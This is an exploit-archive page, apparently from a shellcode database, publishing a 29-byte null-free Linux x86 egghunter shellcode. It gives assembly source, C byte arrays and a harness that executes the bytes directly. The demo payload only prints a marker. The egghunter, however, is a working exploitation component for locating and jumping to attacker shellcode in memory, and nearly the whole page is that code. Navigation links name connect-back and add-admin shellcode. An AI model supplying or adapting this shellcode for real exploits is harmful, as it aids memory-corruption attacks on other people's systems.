[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux x86 egghunt shellcode
# Published : 2011-07-21
# Author :
# Previous Title : Linux/MIPS - connect back shellcode (port 0x7a69) - 168 bytes.
# Next Title : win32/PerfectXp-pc1/sp3 (Tr) Add Admin Shellcode 112 bytes
/*
Exploit Title: Linux/x86 egghunt shellcode 29 bytes NULL free
Date: 23-07-2011
Author: Ali Raheem
Tested on:
Linux Ali-PC.home 2.6.38.8-35.fc15.x86_64 #1 SMP Wed Jul 6 13:58:54 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
Linux injustice 2.6.38-10-generic #46-Ubuntu SMP Tue Jun 28 15:05:41 UTC 2011 i686 i686 i386 GNU/Linux
http://codepad.org/2yMrNY5L Code pad lets you execute code live check here for a live demostration
Thanks: Stealth- for testing and codepad.com for being so useful.
section .data
msg db "We found the egg!",0ah,0dh
msg_len equ $-msg
egg equ "egg "
egg1 equ "mark"
section .text
global _start
_start:
jmp _return
_continue:
pop eax ;This can point anywhere valid
_next:
inc eax ;change to dec if you want to search backwards
_isEgg:
cmp dword [eax-8],egg
jne _next
cmp dword [eax-4],egg1
jne _next
jmp eax
_return:
call _continue
_egg:
db "egg mark" ;QWORD egg marker
sub eax,8
mov ecx,eax
mov edx,8
mov eax,4
mov ebx,1
int 80h
mov eax,1
mov ebx,0
int 80h
*/
char hunter[] =
"xebx16"
"x58"
"x40" /* x40 = inc eax, x48 = dec eax try both*/
"x81x78xf8x65x67x67x20"
"x75xf6"
"x81x78xfcx6dx61x72x6b"
"x75xed"
"xffxe0"
"xe8xe5xffxffxff";
char egg[] =
"egg mark" /* The rest of this is the shellcode you want found*/
"x83xe8x08" /*This shellcode prints eax-4 i.e. the egg mark*/
"x89xc1"
"xbax08x00x00x00"
"xb8x04x00x00x00"
"xbbx01x00x00x00"
"xcdx80"
"xb8x01x00x00x00"
"xbbx00x00x00x00"
"xcdx80";
int main(){
(*(void (*)()) hunter)();
return 0;
}